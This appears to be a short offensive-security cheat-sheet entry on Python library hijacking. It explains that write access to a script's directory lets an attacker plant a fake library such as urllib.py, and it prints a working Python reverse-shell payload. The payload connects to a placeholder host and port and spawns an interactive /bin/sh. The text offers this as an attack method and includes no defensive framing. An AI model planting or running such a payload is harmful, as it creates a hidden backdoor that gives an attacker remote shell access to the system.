Exploiting writable files and directories

Exploiting writable files

Python Library Hijacking

If we know from where Python script is going to be executed, and we have write permissions inside that folder, or can modify the python libraries on that system, than we can backdoor/hijack a library. As an example, if a script in a user's home directory imports the urllib library, and we can write inside said home dir, we can just create a file called urllib.py with the following content ;

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[port]",[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);